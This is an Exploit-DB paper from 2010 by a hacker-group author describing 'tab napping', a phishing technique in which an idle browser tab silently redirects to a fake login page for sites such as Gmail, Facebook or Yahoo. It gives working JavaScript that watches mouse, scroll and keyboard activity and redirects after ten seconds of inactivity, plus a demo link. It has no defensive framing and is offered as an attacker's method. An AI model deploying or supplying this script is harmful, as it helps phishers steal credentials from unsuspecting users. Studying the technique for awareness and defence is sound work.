Advance Phishing Technique: Tab Napping

EDB-ID:

13950

CVE:

N/A


Author:

s1ayer

Type:

papers


Platform:

Multiple

Date:

2010-06-20


# Exploit Title: ADVANCE PHISHING TECHNIQUE:TAB NAPPING
================================================================
 
=======================================================

# Author: s1ayer
(s1ayer.icw@gmail.com)
============================================================
GREETZ: Lord Crusader,sai,sm4rt,b0nd,jappy,Mr.XXXX and all ICW, Andhrahackers member, and all Indians Out there.
Special Greetz:eberly bro.
Website:www.andhrahackers.com
http://security-informatica.blogspot.com
============================================================
We all are familiar with the technique of phishing, tab-napping is the advanced form of phishing is out in the market, 
in which when u open any genuine page say the page of any legitimate website like any shop,etc... and if you dont use that
page or in short if that page is kept idle for few seconds because of many reasons like we start browsing other site,
attending phone calls etc, then malicious page automatically gets redirected to phished page or duplicate page of popular sites
like gmail,orkut,facebook,yahoo,etc... which we didnt notice, coz.. we never opened that page, so it looks kinda of genuine page.
=================================================================================================================================
Method:
How this is done:
It is done by checking wether your page is idle or not, if it is idle or not used for some particular time period
then it gets redirected:
Things to be done:
1.check for mouse movement
2.check for scroll bar movement
3.check for keystrokes

If any of the above event is not triggered till few seconds , this means user is not using that tab, either is off from system 
or using other tab, so if these conditions are met, then we redirect it to our phished page, which user thinks it to be genuine
page.
===================================================================================================================
Code:
<script type="text/javascript"> 
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
 
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
 
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
 
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
 
    
  }
  else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
 
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
 
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
 
    
  }
  //else do nothing
}
 
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
 
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
================================================================
demo:http://slayericw.zxq.net/tabnappingdemo.html
================================================================
Silence is not our weakness, its just we dont want to waste our time..........................................................
ITs my way of explanation

JAI MATA DI